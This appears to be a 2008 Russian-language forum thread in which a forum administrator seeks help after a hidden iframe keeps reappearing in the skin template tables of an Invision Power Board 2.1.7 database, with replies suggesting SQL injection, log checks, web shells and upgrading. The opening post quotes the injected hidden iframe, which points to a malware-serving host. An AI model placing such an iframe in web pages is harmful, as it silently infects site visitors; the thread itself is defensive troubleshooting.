Подмена в базе

[diablo_]

Доброго времени суток!

 

У меня вот акая проблема: в базу, в таблицу «ipb_skin_sets», в ячейки: «set_wrapper», «set_cache_wrapper», то есть туда, где хранится общий шаблон форума. В определенное место, дописывается код:

<iframe ictti='LO7lIBDE' src='хттп://veryblomar.com/vb/in.cgi?2 ' foole='haLmUCsU' width='498' height='370' style='display:none'></iframe>

 

По ссылке в коде, содержится вирус!!! Не советую проверять! У меня ДР.Веб лицензионный, не может его отловить!

Эта проблема, уже давно у меня! Но эту гадость, нашёл только недавно, в течение 3 - 4 дней, удалял этот кусок кода, и менял пароли у базы данных и фтп. Всё безрезультатно! Каждую ночь, он вновь дописывается!

И самое что интересное, дописывается только в форум, сам сайт, не затронут!

 

Чего делать? Где дырку искать?

 

Форум версии 2.1.7, вроде бы пропатчен!

[smash_TeAm]

все файлы очистить от вирусов и заменить чистыми

[diablo_]

Вирус только в базе! все файлы проверил! там чисто всё!

А бд сколько не чисти, всё равно влазит!

[FatCat]

Похоже, появилась новая уязвимость к sql-инъекциям у "двушек".

В другом топике жаловались, что "гость" пишет сообщения в закрытые разделы, причем пишутся только тексты сообщения; не пишутся айпишники, не обновляется счетчик сообщений в топике, не переписывается автор последнего сообщения в списке топиков...

 

Попробуйте порыться в логах апача по подстроке "iframe", может быть удастся отловить сам запрос, и тогда уже разматывать уязвимость.

[smash_TeAm]

был похожий код у моего знакомого, только он был в файлах, помогла зачистка файлов... а тут раз в бд - может где в какой таске прописался код или всю бд проверить надо... может у кого и подпись с динамическим изображением нехорошим стоит... причин может быть много... в соседнем топике как я понял просто тему перенесли в скрытый раздел и особо там ничего страшного не произошло...

 

UPD: по сабжу в инете нашлась инфа что это вирь тырящий парольки из total commander. А прописывается он полюбому в файлах (есть ведь файлики 0777) или заносится с зараженных машин...

[diablo_]

был похожий код у моего знакомого, только он был в файлах, помогла зачистка файлов... а тут раз в бд - может где в какой таске прописался код или всю бд проверить надо... может у кого и подпись с динамическим изображением нехорошим стоит... причин может быть много... в соседнем топике как я понял просто тему перенесли в скрытый раздел и особо там ничего страшного не произошло...

 

UPD: по сабжу в инете нашлась инфа что это вирь тырящий парольки из total commander. А прописывается он полюбому в файлах (есть ведь файлики 0777) или заносится с зараженных машин...

 

да, пользуюсь тоталом, но пароль там не храню! так что не реально это!

 

вот логи:

77.51.113.190 - - [13/Jun/2008:00:01:39 +0400] "GET http://www.forum.сайт.ru/style_images/1/iframe.html" 304 - "http://www.forum.сайт.ru/index.php?showtopic=4316&mode=linearplus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MRA 4.10 (build 01952); .NET CLR

 

77.51.113.190 - - [13/Jun/2008:00:01:38 +0400] "GET http://www.forum.сайт.ru/style_images/1/iframe.html" 304 - "http://www.forum.сайт.ru/index.php?showtopic=4316&mode=linearplus" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MRA 4.10 (build 01952); .NET CLR 2.0.50727)"

 

это всё что есть

[FatCat]

да, пользуюсь тоталом, но пароль там не храню! так что не реально это!

Когда мне сломали сайт, пароль к ФТП сдернули у дизайнерши кейлогером.

 

 

 

 

вот логи:

К сожелению, это не то.

Логируются только GET-запросы, логов POST-запросов нет?

[diablo_]

Когда мне сломали сайт, пароль к ФТП сдернули у дизайнерши кейлогером.

не, это точно не реал))) пароль только у мну!

 

К сожелению, это не то.
Логируются только GET-запросы, логов POST-запросов нет?

у меня нету, я конечно спрошу у хостера....но не факт что даст

 

не...суппорт сказал что у них отключено это! и ПОСТ не получить!

[Link]

в соседнем топике как я понял просто тему перенесли в скрытый раздел и особо там ничего страшного не произошло...

 

Ну конечно ничего страшного, просто гость(гостям доступ закрыт) понасоздавал пустых тем и пустых ответов в закрытые и невидимые темы. Неизвестно что он еще сделает в след раз.

В логах ниче не могу найти. Поставил снифер, глянем что будет.

 

 

зы: соседняя тема тут http://www.ibresource.ru/forums/index.php?showtopic=53422

[smash_TeAm]

зы: соседняя тема тут http://www.ibresource.ru/forums/index.php?showtopic=53422

Я закрытый раздел не вижу и имел ввиду темку http://www.ibresource.ru/forums/index.php?showtopic=53535

[FatCat]

Вот еще топик: http://www.ibresource.ru/forums/index.php?showtopic=53620

Еще одна "атака гостя".

[Samin]

Может веб шелл на хост залили? Проверьте файлы.

[diablo_]

Может веб шелл на хост залили? Проверьте файлы.

Сравнивал все файлы на серваке, с файлами бекапа на компе! всё чётко и всё соответствует!

И дата созздания файлов, аж прошлый год! а вирус появился примерно в апреле - мае!

[Link]

У меня 2 мнения.

1) реально новая уязвимость двушки

2) дырявые моды

[Sannis]

реально новая уязвимость двушки

Может быть и старая

[Link]

А есть общая тема куда писать возможные дырки? я чет ненашел. Изменено 18 Июня 2008 пользователем Link

[diablo_]

А если обновить форум до версии 2.3.3 ?

это может исправить ситуацию?

И можно ли обновлять с 2.1.7, сразу до 2.3.3?

[Link]

А почему именно до 2.3.3 а не 2.3.5 ?

[diablo_]

не, ну можно конечно и 2.3.5))

я просто для примера написал!

Можно ли?

[Link]

Да все можно. Тока лицензия нужна.

[smash_TeAm]

столько тем на форуме по этому поводу... можно легко обновить с 2.1 до 2.3. и это уже другой вопрос пользуем поиск и читаем правила